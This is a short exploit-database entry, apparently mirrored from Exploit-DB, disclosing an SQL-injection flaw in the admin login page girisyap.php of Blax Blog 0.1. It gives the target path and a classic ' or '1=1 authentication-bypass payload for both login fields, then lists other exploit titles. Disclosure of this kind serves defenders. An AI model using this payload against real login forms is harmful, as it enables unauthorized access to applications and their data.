Blax Blog 0.1 – ‘girisyap.php’ SQL Injection

Exploit Database
115 阅读

作者： cr4wl3r

日期： 2010-03-01
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33684/

source: https://www.securityfocus.com/bid/38465/info

Blax Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Blax Blog 0.1 is vulnerable; other versions may also be affected.

http://www.example.com/admin/girisyap.php

Username: ' or '1=1

password: ' or '1=1

last Exploits
Blax Blog 0.1 – ‘girisyap.php’ SQL Injection的更多信息

Cloudron 6.2 – ‘returnTo ‘ Cross Site Scripting (Reflected)：
OpenCart Theme Journal 3.1.0 – Sensitive Data Exposure：
Pc4Uploader 9.0 – Cross-Site Request Forgery：
SugarCRM 3.5.1 – Cross-Site Scripting：
WordPress Plugin myLDlinker – SQL Injection：
Novell ZENworks Configuration Management 11.3.1 – Remote Code Execution：
MySQLDumper 1.24.4 – ‘index.php?page’ Cross-Site Scripting：
webperformance eCommerce – SQL Injection：